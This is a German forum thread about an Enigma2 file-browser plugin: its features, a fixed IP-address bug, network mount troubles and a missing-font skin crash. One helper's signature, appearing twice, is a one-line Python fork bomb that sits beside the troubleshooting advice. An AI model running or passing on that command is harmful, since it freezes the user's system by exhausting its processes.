Angepinnt [Plugin] Newnigma2 FileBrowser (ab OE2.2)

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • [Plugin] Newnigma2 FileBrowser (ab OE2.2)

    Der newnigma2 Filebrowser ist unsere eigene Entwicklung eines FileBrowsers, mit einigen Funktionen mehr.
    Für die Installion unseres FileBrowsers müsst Ihr folgendes Paket installieren enigma2-plugin-newnigma2-filebrowser.

    Er beherrscht seit neustem auch das Bearbeiten/Erstellung von Netzwerkfreigaben. Nach der Bearbeitung/Erstellung eines Shares, wird der Dienst automatisch neugestartet, sodass
    die Einstellungen direkt übernommen werden.

    Des Weiteren hat er folgende Funktionen:

    - Attribute setzen/ändern
    - Verschieben/Kopieren/Löschen
    - Erstellen von Symlinks
    - Jobs anlegen
    - .deb-Dateien können installiert werden (unser Installer wird dafür geöffnet)
    - und vieles mehr. Einfach mal ausprobieren.

    Auf der Fernbedienung:
    Button >: Damit wechselt man in die Liste rechts
    Button <: Damit wechselt man in die Liste links
    Bilder
    • grab.png

      77,13 kB, 1.920×1.080, 2.401 mal angesehen
    • screenshot.png

      118,66 kB, 1.920×1.080, 1.941 mal angesehen
    • screenshot1.png

      42,76 kB, 1.920×1.080, 1.752 mal angesehen
    • screenshot2.png

      65,22 kB, 1.920×1.080, 1.619 mal angesehen
    • screensho3.png

      26,74 kB, 1.920×1.080, 1.444 mal angesehen
    • grab21.png

      148,79 kB, 1.920×1.080, 1.478 mal angesehen
  • oZxS schrieb:

    Er beherrscht seit neustem auch das Bearbeiten/Erstellung von Netzwerkfreigaben. Nach der Bearbeitung/Erstellung eines Shares, wird der Dienst automatisch neugestartet, sodass
    die Einstellungen direkt übernommen werden.

    werden die vorhandenen shares/mountpunkte übernommen?
  • Schönen Abend zusammen,

    Nachdem ich den ganzen Nachmittag damit gespielt habe, folgende Probleme und Fragen:

    Wenn Mann keinen Hostnamen sondern ip vergeben will, werden die Punkte als Doppelpunkte abgespeichert. Manuell in der Auto.network muss Mann es dann über dem Editor umschreiben.
    Skin standart und Nuke fhs funktioniert. Beim metrix kommt leider beim aufrufen gleich ein Green Screen. Log lade ich morgen noch hoch.

    So und nachdem ich es leider Nicht geschafft habe auto Network einzurichten, die Frage ob Mann die Auto Master d und Automaster wie im 7080 unterforum beschrieben manuel an passen muss?

    Habs versucht und zumindest dann soweit geschafft, dass ich auf meine 8000 und 800 nfs Mounten konnte.
    Auf die nas per Cifs da password vergeben, komm ich leider aber überhaupt nicht, auch nicht wenn ich statt Cifs, nfs versuche. Auch wenn ich die autonetwork von meiner 8000 1:1 übernehme. Finde ich zwar die nas aber keine Files und die nas startet auch nicht.

    Bin momentan wieder zurück auf den netzwerkbrowser, da läuft es einwandfrei.

    Soweit meine Versuche als Laihe. :(

    Lg Tomi
  • @tomi6
    Jo hast recht das mit der Ip war ein Bug habe es gerade korrigiert thx.
    Zu dem anderen brauch ich den crashlog um was zu sehen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Mahlzeit Kati,

    so habe wieder gespielt und den Bug hast behoben die Punkte passen jetzt. :thumbup:

    Interessant ist auch das die nfs Mounts auf meine anderen dreams jetzt sofort nach anlegen funktionieren, nur der cifs Mount auf die fritz-nas nicht. Hier muss ich in der Auto.master die Zeile mit ghost eintragen, bei der master d die eine zeile Auto.network auskommandieren und siehe da dann läuft auch das! =)

    Hab Dir jetzt auch noch das logfile vom Metrix Skin angehängt. Da es mein liebstes ist, wäre es cool wenn das auch noch wer hin bekommt.

    LG tomi
    Dateien
  • HandelGotDBol die Schriftart fehlt. Kopiere den Anhang mal nach /usr/share/fonts/
    (bitte vorher entpacken)

    Nachtrag:

    root@dm7080:/usr/share/fonts# dpkg -S HandelGotDBol.ttf
    enigma2-plugin-newnigma2-picon: /usr/share/fonts/HandelGotDBol.ttf

    Hast Du das Paket vielleicht deinstalliert ?
    Dateien
    • HandelGotDBol.zip

      (27,38 kB, 432 mal heruntergeladen, zuletzt: )
  • Hallo oZxS,

    nein die Datei ist vorhanden. Habe auch nichts entfernt, außer den Networkbrowser. Hab trotzdem deine Datei jetzt darüber gespielt aber immer noch greenscreen. Wie gesagt nur beim MetrixHD Skin.
    Log ist angehängt. Diesmal beim Aufruf von automount.

    lg tomi
    Dateien
  • Öffne deine skin.xml
    und unter <fonts>

    Quellcode

    1. <font filename="HandelGotDBol.ttf" name="HandelGotDBol" replacement="0" scale="100" />

    einfügen gui restart gut
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !